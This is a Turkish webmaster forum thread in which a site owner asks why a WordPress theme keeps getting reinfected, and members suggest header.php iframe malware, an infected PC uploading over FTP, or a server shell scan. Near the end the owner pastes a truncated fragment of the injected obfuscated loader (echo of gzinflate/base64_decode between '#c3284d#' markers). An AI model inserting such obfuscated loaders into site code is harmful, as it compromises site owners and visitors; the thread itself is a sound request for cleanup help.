Arkadaşlar birkaç gündür sitemde virus var ama bulamadım. Dün akşam temayı değiştirdim ortadan kalktı ftp şifremi vs. değiştirdim ama bugün yine aynı temaya bulaştı.
Tarayıcıdan kaynağı görüntülediğimde gördüğüm kodun çıktısını bir txt ye aldım. Bu script sizce nereden geliyor? Bir bakabilirmisiniz?
Kodun txt haldeki çıktısını aşağıdaki linke upload ettim
http://s3.dosya.tc/server2/AGnHom/kod.txt.html
- Üyelik 26.07.2012
- Yaş/Cinsiyet 43 / E
- Meslek Bilişim / İnternet
- Konum İstanbul Anadolu
- Ad Soyad M** D**
- Mesajlar 380
- Beğeniler 55 / 103
- Ticaret 13, (%100)
- Üyelik 21.03.2012
- Yaş/Cinsiyet 32 / E
- Meslek Bilgisayar Öğretmeni
- Konum Manisa
- Ad Soyad A** A**
- Mesajlar 902
- Beğeniler 51 / 110
- Ticaret 51, (%96)
senin pc ye bulaşmıştır büyük ihtimalle virüs (genelde hit programı kullanıyorsan ya da backlınk ondan kaynaklı olabilir)
- Üyelik 26.07.2012
- Yaş/Cinsiyet 43 / E
- Meslek Bilişim / İnternet
- Konum İstanbul Anadolu
- Ad Soyad M** D**
- Mesajlar 380
- Beğeniler 55 / 103
- Ticaret 13, (%100)
yok nod 32 uyarı veriyor sitede de virus var temaya bulaşıyor bir şekilde
- Üyelik 01.08.2011
- Yaş/Cinsiyet 35 / E
- Meslek Makine Müh.
- Konum Tekirdağ
- Ad Soyad A** M**
- Mesajlar 237
- Beğeniler 46 / 58
- Ticaret 6, (%100)
Temanın header.php ye bulaşmış iframe virüsüdür muhtemelen. Notepad++ la açıp içerisinde base64.le şifrelenmiş kısım varsa onu silmeyi dene.
#Blog'canım: maziliguney.com
Reklam, tanıtım yazısı, link vs için iletişime geçebilirsiniz.
Reklam, tanıtım yazısı, link vs için iletişime geçebilirsiniz.
- Üyelik 26.07.2012
- Yaş/Cinsiyet 43 / E
- Meslek Bilişim / İnternet
- Konum İstanbul Anadolu
- Ad Soyad M** D**
- Mesajlar 380
- Beğeniler 55 / 103
- Ticaret 13, (%100)
Temanın header.php ye bulaşmış iframe virüsüdür muhtemelen. Notepad++ la açıp içerisinde base64.le şifrelenmiş kısım varsa onu silmeyi dene.
Hocam temayı tümden silip yenisini koyuyorum yine bulaşıyor biryerden. Birden çok tma denedim temalar temiz ama bir müddet sonra tekrar bulaşıyor.
Av. programı hemen uyarı veriyor log dosyasına nstall_0_msi.exe Trojan.Ransom şeklinde kaydetmiş
C:\Users\Md\AppData\Local\Temp\install_0_msi.exe Trojan.Ransom QUARANTINE - Üyelik 01.08.2011
- Yaş/Cinsiyet 35 / E
- Meslek Makine Müh.
- Konum Tekirdağ
- Ad Soyad A** M**
- Mesajlar 237
- Beğeniler 46 / 58
- Ticaret 6, (%100)
O zaman bilgisayarından bulaşıyordur her ftp.ye bağlandığında
#Blog'canım: maziliguney.com
Reklam, tanıtım yazısı, link vs için iletişime geçebilirsiniz.
Reklam, tanıtım yazısı, link vs için iletişime geçebilirsiniz.
- Üyelik 26.07.2012
- Yaş/Cinsiyet 43 / E
- Meslek Bilişim / İnternet
- Konum İstanbul Anadolu
- Ad Soyad M** D**
- Mesajlar 380
- Beğeniler 55 / 103
- Ticaret 13, (%100)
Bir test edeyim hiç düşünmemiştim. Bu arada sunucuda tema hariç başka bir yerde barınması muhtemel olabilir mi
- Üyelik 01.08.2011
- Yaş/Cinsiyet 35 / E
- Meslek Makine Müh.
- Konum Tekirdağ
- Ad Soyad A** M**
- Mesajlar 237
- Beğeniler 46 / 58
- Ticaret 6, (%100)
Genelde iframe virüsleri header.php ye bulaşıyor. Başka bir yerde olabilir mi tam bilmiyorum yanlış yönlendırmış olmayım ;)
#Blog'canım: maziliguney.com
Reklam, tanıtım yazısı, link vs için iletişime geçebilirsiniz.
Reklam, tanıtım yazısı, link vs için iletişime geçebilirsiniz.
- Üyelik 08.05.2011
- Yaş/Cinsiyet 28 / E
- Meslek Öğrenci
- Konum Ankara
- Ad Soyad B** B**
- Mesajlar 3455
- Beğeniler 783 / 1009
- Ticaret 1, (%100)
Hosting sağlayıcınızla görüşün, sunucuda shell taraması yapmalarını talep edin. Ayrıca temiz tema dosyalarını FTP programı ile değil de cPanel File Manager ile gönderip tekrar deneyin.
- Üyelik 26.07.2012
- Yaş/Cinsiyet 43 / E
- Meslek Bilişim / İnternet
- Konum İstanbul Anadolu
- Ad Soyad M** D**
- Mesajlar 380
- Beğeniler 55 / 103
- Ticaret 13, (%100)
Genelde iframe virüsleri header.php ye bulaşıyor. Başka bir yerde olabilir mi tam bilmiyorum yanlış yönlendırmış olmayım ;)
Hocam header da bu kod anormal değil mi?
#c3284d#
echo(gzinflate(base64_decode("dVr9c9vG0f5X5B8yoExIxn0DEU8d17E3O3tx7PP7mq2X/TNbrj8PO9
#/c3284d#
kısalttım kodu buraya yazarken bu şekilde satırlarca uzayıp gidiyor.
kodu bulduk ama kaynağı bulamadık nereden geliyor bilgisayarıma bulaşmamış sunucuda ya da bir eklentinin js inde olabilirmi? Bu kodu daha önce gören birileri varmı acaba?
Konuyu toplam 1 kişi okuyor. (0 kullanıcı ve 1 misafir)